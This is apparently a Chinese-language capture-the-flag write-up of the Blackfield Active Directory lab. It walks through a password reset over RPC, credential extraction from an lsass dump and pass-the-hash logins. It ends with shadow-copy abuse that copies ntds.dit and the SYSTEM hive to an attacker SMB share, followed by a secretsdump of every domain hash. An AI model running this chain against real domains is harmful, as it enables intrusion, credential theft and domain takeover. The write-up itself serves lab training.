20220423095228_computers.json 20220423095228_domains.json 20220423095228_groups.json 20220423095228_users.json我可以将其载入到bloodhound中,我可以先定位当前用户 support 的节点并点击它,Node info中便会为我列出一些当前用户的详细信息,以及一些预定义的搜索:
浏览一遍大概后,往下拉,会有一个First Degree Object Control(一级控制对象),也就是我们能够直接控制的对象:
如果不知道该权限具体代表什么含义,可以将鼠标移动到权限英文单词上右键help,bloodhound会很贴心的解释一些该权限的含义:
正如它述说,我所使用的当前用户support可以在不知道AUDIT2020用户密码的情况下,更改它的密码,而这个账户是我一开始枚举kerberos用户时也曾枚举到的,Bloodhound同样贴心的给我提供了一些参考示例:
但是该参考示例需要导入PowerView,那我需要登录到目标机器中,但是目前,我没有办法做到这一点。
梳理信息:
似乎我进入到了一个死胡同,我开始梳理我目前掌握的信息。
1. 我拥有一个support用户,但是我无法登录到目标机器获取shell。
2. kerberos协议枚举到svc_backup、support、AUDIT2020三个用户,AUDIT2020我可以更改它的密码,我没有svc_backup用户的任何信息,除了它的用户名以外。
3. smb共享看上去有很多目录但都是空的,或是我没有权限访问到的,我所能访问到的很少而且也不包含什么信息。
4. ldapsearch我不会使用,网上教程很多但是都已经过时。而且它与AD域的关系就像是Apache与HTTP。也不过是为我提供一些目标域的信息,这点Bloodhound已经为我做很多了。
5. 自从我获取到当前用户账户后,RPC我似乎还从未访问过,但是一样的,它也只能为我枚举一些用户名与组,但是与Bloodhound中的信息重复了。
6. 593端口是一个http服务,但我是访问不了的,它会一直转圈转圈转圈转很久很久,起码我最开始打开浏览器访问了它的593,我都将其遗忘了,它还在转圈链接。
看起来我现在可行的方式也只有三种:
1. 我可以寻找相关协议服务的漏洞,说不定自机器出现以来有新的漏洞产生,但是作者出题时他是无法预料到这些漏洞的,如果我这么做了这道题就失去了意义。
2. 我可以硬生生的枚举爆破,但我觉得也不可行,如果这道题可以通过无脑的口令爆破来解决,那这道题本身也就没有什么意义。
3. 我可以寻找什么东西或是windows什么机制,能让我通过support用户去重置AUDIT2020用户的登录凭证。
实际可行的也就第三种,那我该如何寻找这个机制呢?目标机器上现运行有 DNS,kerberos,smb,ldap,rpc。
1. DNS应该不会附带有更改口令或是登录目标这个功能,或许是我无知,但是我觉得这个应该可以先放放。
2. kerberos有可能,但是我通过搜索引擎搜寻相关资料,大都需要我登录进入目标系统,而且我现在无法登录。
3. smb不存在像是永恒之蓝的系统溢出漏洞,那它也只是一个共享,而我也确实都访问遍了,没有其他对我有帮助的信息,搜索引擎也搜索不到能通过smb更改用户口令的资料。
4. ldap虽然这个协议我知晓,但是工具使用我不明白,我也可以先放放,如果我真的走投无路,我会继续学习它,但现在我还有一个选项。
5. rpc,(Remote Procedure Call)远程过程调用协议,一种通过网络从远程计算机上请求服务,主要是在我搜寻资料的过程中,我找到了这篇文章通过 RPC 重置 Windows 密码,作者是Mubix,他为我清晰的讲述了如何利用。
利用RPC重置windows密码:
首先我要以support身份链接RPC:
$ rpcclient -U support //10.10.10.192
Enter WORKGROUP\support's password:
rpcclient $> 可以通过不带任何参数的setuserinfo2命令:
rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $它返回了报错信息,说是无效的参数,间接的说明了我当前使用的support是有权限使用该命令的,那么我可以输入以下格式:
setuserinfo2 23 '' 为什么是23我暂时无法得知,我看到很多演示都是用的23,或许是它语法规范要求这么写,因为是要更改域用户的密码,密码是因当要符合域内密码策略的,我可以通过以下命令得知密码策略:
rpcclient $> getdompwinfo
min_password_length: 7
password_properties: 0x00000001
DOMAIN_PASSWORD_COMPLEX它的最小密码长度为7,但是为了避免其他不必要的麻烦,我会选择用一个符合大多数标准的密码:
rpcclient $> setuserinfo2 audit2020 23 'worldisend123!@#'
rpcclient $> 它什么信息都没返回,只要没返回报错信息,或许我可以当他是成功了,但奇怪的是我还是无法登录目标:
$ evil-winrm -i 10.10.10.192 -u audit2020 -p 'worldisend123!@#'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
是我没修改成功么?
再访smb:
或许我可以再去smb共享中查看一下,因为它还是有很多限制级的文件夹,SMBMAP可以快速的根据我提供给它的身份认证信息帮我枚举出我能够访问的共享目录信息,Kalinux默认集成该工具:
$ smbmap -H 10.10.10.192 -u audit2020 -p 'worldisend123!@#'
[+] IP: 10.10.10.192:445 Name: 10.10.10.192
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share 看起来我可以访问forensic了,的确如此:
$ smbclient -U audit2020 //10.10.10.192/forensic 'worldisend123!@#'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 21:03:16 2020
.. D 0 Sun Feb 23 21:03:16 2020
commands_output D 0 Mon Feb 24 02:14:37 2020
memory_analysis D 0 Fri May 29 04:28:33 2020
tools D 0 Sun Feb 23 21:39:08 2020
5102079 blocks of size 4096. 1681331 blocks available
smb: \> 而且作者似乎提前为我准备了很多信息:
smb: \commands_output\> dir
. D 0 Mon Feb 24 02:14:37 2020
.. D 0 Mon Feb 24 02:14:37 2020
domain_admins.txt A 528 Sun Feb 23 21:00:19 2020
domain_groups.txt A 962 Sun Feb 23 20:51:52 2020
domain_users.txt A 16454 Sat Feb 29 06:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 20:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 20:50:28 2020
netstat.txt A 3842 Sun Feb 23 20:51:01 2020
route.txt A 3976 Sun Feb 23 20:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 20:56:59 2020
tasklist.txt A 9990 Sun Feb 23 20:54:29 2020里边有一个我从未见过的新管理员用户Ipwn3dYourCompany :
$ cat domain_admins.txt
��Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.在另一个目录中我发现了lsass.zip,lsass 是 Windows 中处理身份验证和安全策略的本地安全机构子系统服务。基本上,它在其内存空间中保存着各种身份验证信息。
smb: \memory_analysis\> ls
. D 0 Fri May 29 04:28:33 2020
.. D 0 Fri May 29 04:28:33 2020
conhost.zip A 37876530 Fri May 29 04:25:36 2020
ctfmon.zip A 24962333 Fri May 29 04:25:45 2020
dfsrs.zip A 23993305 Fri May 29 04:25:54 2020
dllhost.zip A 18366396 Fri May 29 04:26:04 2020
ismserv.zip A 8810157 Fri May 29 04:26:13 2020
lsass.zip A 41936098 Fri May 29 04:25:08 2020
mmc.zip A 64288607 Fri May 29 04:25:25 2020
RuntimeBroker.zip A 13332174 Fri May 29 04:26:24 2020
ServerManager.zip A 131983313 Fri May 29 04:26:49 2020
sihost.zip A 33141744 Fri May 29 04:27:00 2020
smartscreen.zip A 33756344 Fri May 29 04:27:11 2020
svchost.zip A 14408833 Fri May 29 04:27:19 2020
taskhostw.zip A 34631412 Fri May 29 04:27:30 2020
winlogon.zip A 14255089 Fri May 29 04:27:38 2020
wlms.zip A 4067425 Fri May 29 04:27:44 2020
WmiPrvSE.zip A 18303252 Fri May 29 04:27:53 2020
5102079 blocks of size 4096. 1681316 blocks available
smb: \memory_analysis\> get lsass.zip 我可以通过pypykatz工具从内存转储中提取凭据,Pypykatz 是 Mimikatz 的 Python 版本,Kalinux默认集成,它毕竟包含了目标进程中所有的身份凭据,可能会很多,为了阅读方便,我添加了一个|more让其显示到more暂停:
$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMPpypykatz lsa minidump lsass.DMP |more首先我拿到了svc_backup用户的凭证:
$ pypykatz lsa minidump lsass.DMP |more
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None再往下还会有Administrator的凭证:
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a89550
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
== Kerberos ==
Username: Administrator
Domain: BLACKFIELD.LOCAL
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
== DPAPI [25869]==
luid 153705
key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9以svc_backup身份登录目标:
我可以尝试用Administrator哈希去PTH移动的目标机器,但是我还是登录不上去:
$ evil-winrm -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 -i 10.10.10.192
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
重要的是svc_backup也不行:
$ evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
看来我还是需要从smb共享下手,crackmapexec可以帮助我用hash进行枚举检测:
$ crackmapexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d我可以试一下administrator:
$ crackmapexec smb 10.10.10.192 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE administrator哈希认证失败了,看来是更改掉了。svc_backup也无法直接PTH移动上去:
$ ./psexec.py svc_backup@10.10.10.192 -hashes :9658d1d1dcd9250115e2205d9f48400d -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.192.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'forensic' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'profiles$' is not writable.
[-] share 'SYSVOL' is not writable.wmiexec也不可以:
$ ./wmiexec.py -hashes :9658d1d1dcd9250115e2205d9f48400d BLACKFIELD/svc_backup@10.10.10.192 "whoami"
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied我又尝试了crackmapexec的winrm枚举当前身份可访问的远程管理:
$ crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
http链接打不开,Pwn3d!像是该用户的明文密码,可惜我还是登录不上去:
$ evil-winrm -i 10.10.10.192 -u svc_backup -p Pwn3d!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
smb也无法查看更多的共享:
$ smbmap -H 10.10.10.192 -u svc_backup -p 'Pwn3d!'
[!] Authentication error on 10.10.10.192如果administrator认证失败是因为哈希错误,那svc_backup应该是可以登录上去的啊,为什么会失败呢,我又试了一次,这次它竟然登录了进去,玄学:
$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> 获取user.txt:
我找到了user.txt:
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 2:26 PM 32 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt利用卷影副本转储散列哈希:
我可以查看一下当前用户的权限,因为它的用户名看着像是Active Directory一个特殊的组:
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled它有添加工作站,备份,恢复,关机,绕过检查,增加一个进程工作集,因为它确实是在Backup Operators组中:
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 10:54:48 AM
Password expires Never
Password changeable 2/24/2020 10:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/23/2022 5:42:10 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> 我可以进入管理员目录,但我无法访问root.txt,看起来我还是需要获取域管理员权限:
*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
Access to the path 'C:\Users\administrator\desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\administrator\desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\administrator\desktop>Backup Operators组中的人如果凭证泄露会很危险,因为他们可以创建磁盘卷影副本并访问系统正在使用的文件。例如读取Ntds.dit,它位于C:\Windows\NTDS\NTDS.dit。但是活动目录无时无刻不在访问Ntds.dit,如果直接对其进行更改操作会被系统拒绝。在以下文章中表述了好几种转储散列哈希值的方式,而我也找到了不会被系统拒绝的办法,例如我拷贝到其他地方,再试图对其更改读写便不会影响活动目录访问NTDS.dit乃至于我不会被拒绝:
https://pentestlab.blog/tag/diskshadow/关于diskshadow工具微软官方就有介绍文档:
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow关于diskshadow以及卷影副本更多的介绍,在《内网安全攻防:渗透测试实战指南》中有提到过,这是书中的部分示例:
//设置卷影拷贝
set context persistent nowriters
//添加卷
add volume c: alias <卷名>
//创建快照
create
//分配盘符
expose %<卷名>% <盘符>:那么我可以照葫芦画瓢:
set context persistent nowriters
add volume c: alias whomi
create
expose %whomi% z:Evil-WinRM内置文件上传模块:
*Evil-WinRM* PS C:\Users\svc_backup\desktop> upload whoami.txt
Info: Uploading whoami.txt to C:\Users\svc_backup\desktop\whoami.txt
Data: 112 bytes of 112 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\desktop> ls
Directory: C:\Users\svc_backup\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 2:26 PM 32 user.txt
-a---- 4/23/2022 6:29 AM 84 whoami.txt但是它失败了,它执行一半就停了:
*Evil-WinRM* PS C:\Users\svc_backup\desktop> diskshadow /s whoami.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 4/23/2022 6:31:58 AM
-> set context persistent nowriters
-> add volume c: alias whomi
-> create
The .cab metadata file cannot be stored in the current working directory, because it is read-only.
Use SET METADATA to specify an existing, writable directory 我不知道什么原因,我担心同一个目录文件太多会遗留一堆垃圾,我准备换个目录试试,在我准备换个目录的时候我发现了以下信息:
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/26/2020 5:38 PM PerfLogs
d----- 6/3/2020 9:47 AM profiles
d-r--- 3/19/2020 11:08 AM Program Files
d----- 2/1/2020 11:05 AM Program Files (x86)
d----- 4/23/2022 6:33 AM temp
d-r--- 2/23/2020 9:16 AM Users
d----- 9/21/2020 4:29 PM Windows
-a---- 2/28/2020 4:36 PM 447 notes.txt
*Evil-WinRM* PS C:\> type notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)root.txt是加密的,即使我能获取到也还需要密钥进行解密,但是这不应该是我当前想的事情,我得先获取管理员权限再说。为什么刚刚执行失败我也找到了原因,我在linux中编辑的文件,需要进行一次格式转换才能被windows正常识别:
$ unix2dos whoami.txt
unix2dos: 正在转换文件 whoami.txt 为DOS格式...*Evil-WinRM* PS C:\temp> upload whoami.txt
Info: Uploading whoami.txt to C:\temp\whoami.txt
Data: 120 bytes of 120 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/23/2022 6:42 AM 92 whoami.txt
*Evil-WinRM* PS C:\temp> diskshadow /s whoami.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 4/23/2022 6:43:05 AM
-> set context persistent nowriters
-> add volume c: alias whomi
-> create
Alias whomi for shadow ID {40f76e7e-86ba-4fba-a5da-3a630b790a01} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {6b14bcc8-3129-4976-a812-9f81e5093ce8} set as environment variable.
Querying all shadow copies with the shadow copy set ID {6b14bcc8-3129-4976-a812-9f81e5093ce8}
* Shadow copy ID = {40f76e7e-86ba-4fba-a5da-3a630b790a01} %whomi%
- Shadow copy set: {6b14bcc8-3129-4976-a812-9f81e5093ce8} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 4/23/2022 6:43:07 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %whomi% z:
-> %whomi% = {40f76e7e-86ba-4fba-a5da-3a630b790a01}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\temp> 可以看到这次回显的信息很多,并且有提示copy was successfully,看起来这次像是成功了,我可以试着访问Z卷:
*Evil-WinRM* PS C:\temp> z:
*Evil-WinRM* PS Z:\> ls
Directory: Z:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/26/2020 5:38 PM PerfLogs
d----- 6/3/2020 9:47 AM profiles
d-r--- 3/19/2020 11:08 AM Program Files
d----- 2/1/2020 11:05 AM Program Files (x86)
d----- 4/23/2022 6:42 AM temp
d-r--- 2/23/2020 9:16 AM Users
d----- 9/21/2020 4:29 PM Windows
-a---- 2/28/2020 4:36 PM 447 notes.txt
*Evil-WinRM* PS Z:\> 那么接下来我就应该读取Ntds.dit文件,为了方便,我想将Ntds.dit传入到我的机器中,我准备通过smb共享来实现:
$ ./smbserver.py share /home/worldisend -smb2support -username whoami -password whoami
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed不过可惜,权限不够:
*Evil-WinRM* PS Z:\> copy z:\Windows\ntds\ntds.dit \\10.10.16.12\share\ntds.dit
Access to the path 'Z:\Windows\ntds\ntds.dit' is denied.
At line:1 char:1
+ copy z:\Windows\ntds\ntds.dit \\10.10.16.12\share\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (Z:\Windows\ntds\ntds.dit:FileInfo) [Copy-Item], UnauthorizedAccessException
+ FullyQualifiedErrorId : CopyFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.CopyItemCommand
*Evil-WinRM* PS Z:\> 这邪恶winRM自带的也不行:
Evil-WinRM* PS Z:\> robocopy /b z:\windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Saturday, April 23, 2022 6:56:40 AM
Source : z:\windows\ntds\
Dest : Z:\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 z:\windows\ntds\
2022/04/23 06:56:40 ERROR 19 (0x00000013) Accessing Destination Directory Z:\
The media is write protected.
Waiting 30 seconds... Retrying...
2022/04/23 06:57:10 ERROR 19 (0x00000013) Accessing Destination Directory Z:\
The media is write protected.后来我找到了这个工具:
https://github.com/giuliano108/SeBackupPrivilege它是基于powershell的工具来滥用SeBackupPrivilege权限,根据官方的文档介绍,我需要用到两个dll,我可以通过Evil-WinRM上传,这两个文件在/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug目录中:
-[~/…/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug]
└─$ ls
SeBackupPrivilegeCmdLets.dll SeBackupPrivilegeUtils.dll
$ cp * ~*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeCmdLets.dll
Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeUtils.dll
Info: Uploading SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> 然后将其导入到当前会话中:
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp> 这样我就可以将ntds.dit转存到我本地,可能文件很大,需要的时间很长。:
*Evil-WinRM* PS C:\temp> Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit \\10.10.16.12\share\ntds.dit还需要ntds.dit解密密钥,位于注册表HKLM\SYSTEM中,虽然也慢,但还好:
*Evil-WinRM* PS C:\temp> reg.exe save hklm\system \\10.10.16.12\share\system
The operation completed successfully.然后我可以通过Impacket 的 secretsdump提取哈希:
$ ./toolbox/posttool/impacket-0.9.24/examples/secretsdump.py -system system -ntds ntds.dit LOCAL
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::拥有了root.txt:
这样我就可以pth移动到目标机器中,或者evil-winrm以哈希链接都可以,但是我选择后者,因为它提到过root.txt被加密了,如果涉及到一些文件相关的操作,evil-winrm会更好,但我觉得我被骗了,因为root.txt根本没加密:
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 4:36 PM 447 notes.txt
-a---- 11/5/2020 8:38 PM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt又或者被其他同僚捷足先登了也有可能,因为我捕获到了他的痕迹:
*Evil-WinRM* PS C:\temp> net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
Unavailable H: \\10.10.14.4\blackfieldA Microsoft Windows Network
The command completed successfully.
*Evil-WinRM* PS C:\temp>